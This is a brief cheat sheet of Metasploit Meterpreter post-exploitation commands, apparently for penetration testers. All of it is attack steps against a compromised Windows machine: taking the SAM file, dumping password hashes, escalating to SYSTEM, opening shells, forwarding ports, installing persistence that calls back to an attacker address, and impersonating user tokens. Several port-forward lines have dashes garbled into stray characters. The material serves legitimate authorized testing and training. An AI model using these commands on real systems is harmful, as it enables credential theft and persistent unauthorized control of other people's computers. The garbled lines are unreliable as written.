Useful commands with Meterpreter
Meterpreter upload file to Windows target: meterpreter> upload file c:\windows
Meterpreter download file from Windows target: meterpreter> download c:\windows\repair\sam /tmp
Meterpreter run .exe on target β handy for executing uploaded exploits: meterpreter> execute -f c:\windows\temp\exploit.exe
Creates new channel with cmd shell: meterpreter> execute -f cmd -c
Meterpreter show processes: meterpreter> ps
Meterpreter get shell on the target: meterpreter> shell
Meterpreter attempts priviledge escalation the target: meterpreter> getsystem
Meterpreter attempts to dump the hashes on the target: meterpreter> hashdump meterpreter> credcollect
Meterpreter create port forward to target machine: meterpreter> portfwd add βl 3389 βp 3389 βr $IP
Meterpreter delete port forward: meterpreter> portfwd delete βl 3389 βp 3389 βr $IP
Search excel files on target machine: meterpreter> search -f *.xlsx
Get user id: meterpreter> getuid
Check whether arch == meterpreter or migrate to x64 process!! meterpreter> sysinfo
Identify other machines that the supplied domain user has administrative access to msf> run post/windows/gather/local_admin_search_enum msf> connect $TARGET $PORT
Uses SSL: msf> connect -s $TARGET $PORT
Starts ruby shell: msf> irb
Integrations with other tools: msf> load pcap, wmap, nessus msf> db_hosts msf> db_vulns msf> db_exploited
Meterpreter persistence mode meterpreter> run persistence -U -i 5 -p 443 -r $IP
Impersonate any user meterpreter> use incognito meterpreter> list_tokens -u meterpreter> impersonate_token MACHINE\user meterpreter> drop_token
Last updated